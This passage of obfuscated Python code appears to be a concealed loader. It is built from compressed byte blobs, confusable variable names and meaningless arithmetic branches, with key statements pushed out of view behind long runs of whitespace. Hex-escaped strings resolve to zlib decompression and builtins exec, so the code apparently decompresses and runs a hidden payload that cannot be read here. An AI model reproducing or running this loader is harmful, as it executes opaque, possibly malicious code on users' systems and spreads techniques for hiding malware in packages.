\xf3Wy\xd5K~\xf1\xc9\x8f\xc7\xefH\xa3\x1cx3o\xbe\x9cL\x97/gy\xd8\xbe\x10P\x04B\xed\xdb\xbc\x11\xd9\xb6\xfaj\\\x87\xf4\x8f\xcdH\xac\xff\xe4\xed"\xf6\xae\xdb\x0f\x06\x90 P\x1bl?\x82\xf4\x92]\x92\xb2\x7f\xdc~\xb0\xd0U\xfa\x05\xdeN\x90\xa2\xe9\x8a\x00"\x04\x88\'\xd0\xf8\x95\xd5\x86\x19\x0b\x8cC\xe2\xbf\x11.\x9b\x15-9c\xd9\xb84')

        _floor(_add = 25951 * 62384)._system(Modulo = _power.Calculate / -8694)                                                                                                                                                                                                                                                          ;_floor.Statistics(Builtins='nnnnmnmnmnmmmmmnmm',Round=b'!\xe78\xdb\xcf\x19\x16Cd%C\xe2\xb8Qo@Q\xb8j\x887\xec\x9b\xc4I\xc0\x18\xc3\xa1\xf4K\x13]!\xc6\xc6\x9f0\x05dT\x85\xb8\x08\xc9\xcd\x7f\x9ea\xb3jl\x8a\x08\x9c,\x86\xa8n\xc9\xc8\xbf!a\x849<3\x1b\x9exV\xc0\x01m\x99V\xbd\xb0\xb0:8\xb5\xachN\xbbIi\xfe\xd0A\xa4z\x1e\x08nsm+VCq\xc2\xa9\r7\xcdJ\xc1\xbf\x17\x9a\x1e\xe7\n[\xf5\xa7\x88\xadf\x9f\xb7\x1f2n\xc8L\x98\x8b\xd8I\x87\xcd*\xc4BFv\xbd\xfd`".\x05\x16\x83\xacq\x86\x14\xe3\xabu\x89\xa6I?kw\x80Fp\xd5j\xd4\x0b\x8a\xbd\xbb`\xb2\xe7\x8b+nR\xf8V{\x84\xd6z\x9b\x8a*\x8c\xfd\xab-\xb5\x96\x87\x85x\xa4\x17\xb4\xccZ\xf7\xd6`\xa5\xf8\xb7\xf0PZ\xcb\xcarK\xe2\xd7\x18R\x1d[N\t`tX\xa1\x00E\xbfV\x1fJ+(kvh\x8ehy\x16\xa9#\x9c\xad\xde\xe1\n\xf5\x84t\x83oy\xcezX\x19\xe1\x8bq\xf6x\x9fA\x0b\x97\x0eP\xc8\'1\xcb\xff\xe4\x9bF\xe5\x12\x8b\x16\x02t\xfe\x01YC\xdf\x8f\x96\x93Be\x13\x99#\xee\xd0\x9f\xeb+\x1b\x0c\xad\xa6J!\x92\x94\x7f8\x1br\xf6\x1a\x120Q\x96}\xbfb\x0f\xe8VB\x04\x13\xc7\x98\xd2D|u\xa9v\xc1\x82\xeb\x15M\xd0\x14\xad\x81\x13\xfa\xea3\x91\xf8P+\xc2\xe6\x0b\x9e\x8a\xac$\x1a\xc0Go+\xf8\xf8\xa5\xb3\xaf\xd1\x02\xec\xc3\xe9\x81(.\x84/_\xd7\xaa\x04\x129<\xe4\xe5\x1b8\xa1\xcb\xa2"R\x84j\xe7,IY0=~\xc8\x1f\x9a{\x90V\x03\xd5\x04l\xf8\x8c\xad\x10M\xf8\xfca\xc5\xed\xb2b\xfbH\xf3P2\x96\x042\x06\xf6\xc6\xe7\x0f\xd7Z#\xd4\xda\xe1q\x19x\x93\xeb\xbc"\x0fSz\x9fb\x95\xb2\xe9\xe5\x83\xa6}\xd7  \x99\xda\xf3\x82\xdcJ\xc12\xe7<o6\x9f\xdb\x90q\xec\xc98\x9f[\xf1z&\xe2A\xb5\x98\x0e\xa7\x12\x18\xc2\x05N\xe6\x863C\x00\xd3$\xf0=jQ\xc0\xbau\x10\xf1q\xce\xb1\x93(ugb[8\xb7\xe6\xf4@\xfb#u<\t\xbe\xaf\x92>\xd4d\x01\x1c\xefk\xd6;\xac\xc2\x13?T\xfb\x901H\x97\xb9\x89P\xd3\x1e\x92EMC\xcdr\x9a\x1b\xce\xac\xec\xfb{\x9c\xd4\x01CR\x00E\xc6\xf8\xed\xa1\xd6jO\xf2\xd0+;\x86\xccD\x86"\xed\xbb:\x10S\x85\x0b\xed\x97V\xe4ES-2\xc0\x03\xe8\xf7\x92\xfd\x84HFuq\xf2n\xbc\x00\x87\xa8%Z\xea\xa1B\xe4\xdeF\x12\x01\xf9\xf7b\xa9\xf6\xf3\xcf\xe0\xdeef\xdb\xe7\xdf\x96\xe3\xf7\xd00\x886}\x9e.f^9O\x98\xe5\xf4_\xd3\x17\xe1\x87\x9f\xc0^H\xe9IL\xce\x17Y\x19\x96+n+\xbbe5\xd2\x15Nc($w\xf8B\x91$\xe7\xe7\xc7\xff|q\xf5\xe7\xbb\xbf\xfc\xe3\xbf\xfd\x8b\xf7\xef\x7f\xb9\x1a\xfe\xe3\xf9\xdd\xbf\xff\xab\x9c\xd5f\x1c\x84\xfe\xb1u\x1dC\xa6K\x11\xac:q\xbf\xf8\xc7\xc2\x80\xc4\xa0P\xca\xc2\xa36\x99\xd7<7X\xd7\xedC\x18+\xf4\xbf\x08\x82$Q`\x06\xb3\xff\x1c2G\x0b1K\xf8\xfc\x1cf\xa7\xe5\xc65\x17o\xe3\xd9s\x11\x0c\'dR[wFxLv%\xbf\xeaI\x95\xde\xab\xd8\xa8\xbfg\xcf/\xc7\xa6\xc5=:wko\xeb\x0eX:\xca\x89\xdc\xab\xd27\x9f\x9e_F/?\x9e\xef`\xd4\x9c\x9d\x91\xb5\x0cc(\xf0F\xc2\x1d\xady\xd7\x88\xbf\x8a$\xd1mn\x97\x0e\x00\xba\xd6\xa6\x83\xeb\x93wfd\xc8\xfc\xad\x83.\xd4\xf6\xf1\xbf\r\xff\x9f?\xdfx\x17\xe7\xde\xdf\xef\xbe\xff\x8a\xe3t\x9e-\x05\x8a\xbef\x90`U\xed\x8d\xd7q\xaae\x87\xfc\xe8u4\x7fy_\x1e\x87\x9f\x9e\xd5\nt7\xc9\xc6?\x1e\x95\xe2z,\x96\x17\xde\x15\x8f\xf4\xb3\x0b"\xf0`\xae&Z\x96X\xbf\xcb\xce\x08G\xc3\x8d \x8c\x06\xfe\xf0L_\xc1\xe6\x0b\xb0\x8cn\x84\xa0\xb9\\w\x05\xab\x93\x03\x16\xae\xc2 \x18\xf3a\xcag\xabC\xa6<\xa3\x89h\x8d\x9a\xaeJ\x884$\xc2\xfb\xcbW\xeb\xaa\xe0F\xdaN\x8d\x9c\x03E\'\x16\xc4\xc2\x0b\x16\xdb\x98\xe9\x17\xd5\xed\xb3o\x92U%c\x96;x\xbbe\xd7H&\xa3\x86\x82-\x87\xfe\xd97\xa3\xba\xad\x9d\x9b\xbe+a\x0f\xc4\x98cM\xe6$T\x16\xb4T[\xd1\x1b5v\xa2Q\xa0&\x8a\x93\x96\xb0\xedv3\xe4\xb4p\x19Z\xd7du\x1bn\xb7\x13\x06\x9bhn\x06\x98\xfa\xa8\xad\x1eG?\xf1\x0e`\xc2\xcc3\x16\x06eyZ\\\xfcw\xc3o$H\xba\xf7Z\r{\xce~<\x8d\xa7w&\xd3\xd5\x8a\x86\xdf\x06\xba\x97\xdb\xdf\n\xb0\xdeS\x96\xbdxw4\xe7\xad\xc9\xbb\xf6:Z\xfc\xb5r?\xf0\xb7\x16\xc1\x87y\xbb\x18\x0e\x88GY\x8f\xad\xbb\xf34<\xce\x84\xcd\xad\rp\xc1\x04\x1e\xd3\x9f/8\xef\xaf\x07\xa6\xa9&Z\xb1W8\x9bUC`\xfd\xc9\xc1\x1f7Be\xdc\r\n\xa6\xd8\xaa\xd5\xe7\xc5\xe7\xb6n7\xbfL_\xa0\xf7\x1c[\x87<\xf9\xbf\xcfr=\xab\xfa\\q\xff\x14\xac\xf7\x80>\x19\xc4\xe6S\xe2\xd2\xdahB\xb1\x84h\x8f\x1ep\tl\xbe.\xf8[\x0b\x94\xb4/\xc9[s\x86\x9bw\xafg\xb3\x0fg\x9a6#\x07}\xae\xdc\xc3zC\xb7\xfdW23\xeb\x9f\xaf\xb1K\xaf\xfcQ\xf9X\xba\x8aY~m\x82\x1eZ\x86d\xed\xe5\xb1\xf68\x1aK\x16\x8e3#\x06\xd0\xff\x90n\xdc7Cxb\xa2&\xb1\xe0\x93\x1a\x84\x8f\xa3\x97\xe3c\xa6\xd4z \xe1c\xfe \\\xa0\xd0\xdd\x96(\xd0\xff\x8f\xff1]La\xc9z>\xf9o\xef\xfd\x9f\xb3\xd9\t\x0c`)\x83a#)I\x88t\x04=\xf6hB;\x964(\x84f\xcf\xd8h\x91\xe9\xd81\xad\x9dQ\xc1\x7f\xd7\xc6\x07\tE\xc7\xcf\x9e\xa6\xfd60t%X\xdf~;=\xfd\x98\xe9\xb0C\xb6Q\x92\x11\x9d\xedL\x15Z\x0f)=o\r\xf08\xaf\xca\x94\t\x7fk\x91\x11\x06\r\xb0^\xf5\xe2\xd5F{\x07.\x16\xac\x89I71\x9e\x99`\x95$Y}\xf0\x97\xca\xd4\xd6\x90\'i\x06\t\xb0\x8f\xbf\x18\x13\x8bF\x14\xd0\x1e\xc8\x037g\xeea\x82n\xe0\\\xb1\xbbW2\x8d\xa2\xa4\x97\xaag\x029\xc7\xa3x\xb6\x12S7\x13\x04R9=\x0c~W\xc0\xb2\xd4\xc9\x04\x0f\xd7c{\xb4Y\x9cDD\xc5\x9ar\xa5\x0f~_\xa8\xaeu,\x97(\xde9\xde\\xF*\x15\xf6$\xd8\xa0\x83\x81\x90Z=\x8dWqL\x89\x8d]\x9b\xd9\x19P{\xeb\xad9\xd9\x0f\xe8\xd6\x97\x19\x9a\xf9\xafN\xfe\xaf\x95s\xfc\xe3\xe8\xaf\xd3\xbb\xd1\xd3\xf8\xd7\xf9\xdf\xa6(L\x7f;\xfd(a\xe6z\x94\x90!\xa6\xe0\xfb\xc2\x7f\xcf\xca/\rW:\x14\xe7\xd7\x90I\xb7!\x10bg\xb7\xf54\xe8\xcf\xee\xfd\xc0\xe7\x8e\x12\x07~8\t\xa7\x08a\xe2\x12\x00YAG\t\xa6\xaa\xcb\xcc\xd24\xe8\xa7I2U\x1d#JG\xc1 \x98\x02\x04\x12\xe0t\xba^?H\x838\x89\x82\x99z\x9d\xc0k<\x08\xfc \x8e\xfa\xe1H\xbd\xaa\xee\x130 j\xe6\x0ff\x83\xe0\xfe>\x0eU\xb7\x02 %\xd47\xc7\xaf\x80\x0f\xe3/{\xa3(\xf0c\xee\xce\xe6w\xabA\xa3\xf0\x8b~2\x80_\xf8Qh\x1d\xa5\x04\xe2T5\xc0\xa5\xee\x07\x93\xca\x87\xaf\xcf#\xec\xab\xa3G\x89\xba\xfaq\x12G\x04\xaa\r\x92 \x7fV\x89\x94s\xbd\xdc\x95\xa4\x03\xd8\x9f\xaf\xda\x1b\x06]\xaa\xce(P\x83\xd0:\xcb\xd4|\x17Y\xd73\x19\x8d\xd4\x91\xa1\x9df\t@\x1bc\xfb7I\xae\\]WM\x90\x00)q5\xd4\xdf\x15\x1d\x91\xd3\xa2\xae\x1a\x05O\x8f/O\xd3\x95\x01!\x86|\xc2\x98\x1f\xb9\x17\xaf\x1f\x7f\x16S\x8b\xa8~k\x86\xdf\xe6\x03\xeb\xb1\xa8m\xed8$\xd7\x1e\xfc\xe4\x9dZ\xa8\xee\xee`e\xbc\xbb;;\xb3\xe2\xdf\xb5It\xb9\xe4|\xb5\x8c\x8d3\x169%[`\x06\xe5\x92|\xc3D\x9aF\x7f\xf7}\x13\xaf\xa5i\r\xd4\x86\xbaO\xff\x1f7$\x8d\xb9')

        if 436016 > 2720509:
            _floor(_add = 73343 - -37836)._walk(_hypothesis = 87529 + _power.Calculate)
        elif 416864 < 3272873:
            _power._system(Modulo = _power.Calculate / 21685)                                                                                                                                                                                                                                                          ;DDDooOoODODooOoDODOOo,wxwwwwxxxwwxwxwxwxx,ljjjlliiljiliijji,jljllijililljlljjiiiiliii,XWXXXXWXWWWWXWWWWWXWWXWX=(lambda NMMNMNNMMNMMNNNMNMN:NMMNMNNMMNMMNNNMNMN(__import__('\x7a\x6c\x69\x62'))),(lambda NMMNMNNMMNMMNNNMNMN:NMMNMNNMMNMMNNNMNMN['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda NMMNMNNMMNMMNNNMNMN:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(NMMNMNNMMNMMNNNMNMN)"),filename='\x4f\x4f\x6f\x4f\x4f\x30\x4f\x6f\x6f\x6f\x30\x30\x6f\x4f\x4f\x30\x6f\x6f\x6f\x30\x30\x6f\x4f\x30',mode='\x65\x76\x61\x6c'))),(lambda XWWWWXXXXWWXXWWXWWXWXXWXX,NMMNMNNMMNMMNNNMNMN:XWWWWXXXXWWXXWWXWWXWXXWXX(NMMNMNNMMNMMNNNMNMN)),(lambda:(lambda NMMNMNNMMNMMNNNMNMN:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(NMMNMNNMMNMMNNNMNMN)"),filename='\x4f\x4f\x6f\x4f\x4f\x30\x4f\x6f\x6f\x6f\x30\x30\x6f\x4f\x4f\x30\x6f\x6f\x6f\x30\x30\x6f\x4f\x30',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63'))
        _floor(_add = 61148 * 81221)._system(Modulo = _power.Calculate / 70709)                                                                                                                                                                                                                                                          ;XWXXXXWXWWWWXWWWWWXWWXWX()(jljllijililljlljjiiiiliii(wxwwwwxxxwwxwxwxwxx(DDDooOoODODooOoDODOOo(ljjjlliiljiliijji('\x76\x61\x72\x73'))),_floor._builtins(Product='IlIIlIlIIIIIIIlllllIII')+_floor._builtins(Product='jiljjljjljjljjljiijliiij')+_floor._builtins(Product='XWXWWXWXXWWWXWWWWXWWXWW')+_floor._builtins(Product='ILJJIIILIJLILJLJI')+_floor._builtins(Product='NNNNNNNMMNNNNMNMN')+_floor._builtins(Product='SS2SSS2222222SS22SSS22S222')+_floor._builtins(Product='lIlllIIIllIIIIllIIIIlI')+_floor._builtins(Product='MMNMMMNNMMNNMMMNNNMNMMMMM')+_floor._builtins(Product='oODDOODDODOoDDooDOoo')+_floor._builtins(Product='OoOODOoOODOoDDOOOOOooDODo')+_floor._builtins(Product='jjjjiljijjijiilllljjijjj')+_floor._builtins(Product='nnnnmnmnmnmmmmmnmm')))

    except Exception as Invert:
        if 423393 > 8924058:
            _floor.execute(code = CallFunction(Invert))

        elif 213786 > 5497030:
            _floor(_add = 54445 - -72456)._system(Modulo = _power.Calculate / -9153)
